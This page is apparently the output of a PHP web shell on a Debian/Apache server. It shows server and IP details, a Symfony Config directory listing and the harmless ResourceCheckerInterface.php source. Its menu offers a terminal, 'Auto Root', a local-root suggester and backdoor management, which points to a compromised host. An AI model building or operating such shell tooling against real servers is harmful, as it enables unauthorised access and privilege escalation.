Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
php /
Symfony /
Component /
Config /
Delete
Unzip
Name
Size
Permission
Date
Action
Builder
[ DIR ]
drwxr-xr-x
2026-06-02 06:37
Definition
[ DIR ]
drwxr-xr-x
2026-06-02 06:37
Exception
[ DIR ]
drwxr-xr-x
2026-06-02 06:37
Loader
[ DIR ]
drwxr-xr-x
2026-06-02 06:37
Resource
[ DIR ]
drwxr-xr-x
2026-06-02 06:37
Util
[ DIR ]
drwxr-xr-x
2026-06-02 06:37
ConfigCache.php
1.5
KB
-rw-r--r--
2026-05-27 08:15
ConfigCacheFactory.php
1.08
KB
-rw-r--r--
2026-05-27 08:15
ConfigCacheFactoryInterface.php
958
B
-rw-r--r--
2026-05-27 08:15
ConfigCacheInterface.php
1.25
KB
-rw-r--r--
2026-05-27 08:15
FileLocator.php
2.59
KB
-rw-r--r--
2026-05-27 08:15
FileLocatorInterface.php
1.03
KB
-rw-r--r--
2026-05-27 08:15
ResourceCheckerConfigCache.php
5.52
KB
-rw-r--r--
2026-05-27 08:15
ResourceCheckerConfigCacheFactory.php
1.05
KB
-rw-r--r--
2026-05-27 08:15
ResourceCheckerInterface.php
1.2
KB
-rw-r--r--
2026-05-27 08:15
autoload.php
10.04
KB
-rw-r--r--
2026-05-27 22:18
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config; use Symfony\Component\Config\Resource\ResourceInterface; /** * Interface for ResourceCheckers. * * When a ResourceCheckerConfigCache instance is checked for freshness, all its associated * metadata resources are passed to ResourceCheckers. The ResourceCheckers * can then inspect the resources and decide whether the cache can be considered * fresh or not. * * @author Matthias Pigulla <mp@webfactory.de> * @author Benjamin Klotz <bk@webfactory.de> */ interface ResourceCheckerInterface { /** * Queries the ResourceChecker whether it can validate a given * resource or not. * * @return bool */ public function supports(ResourceInterface $metadata); /** * Validates the resource. * * @param int $timestamp The timestamp at which the cache associated with this resource was created * * @return bool */ public function isFresh(ResourceInterface $resource, int $timestamp); }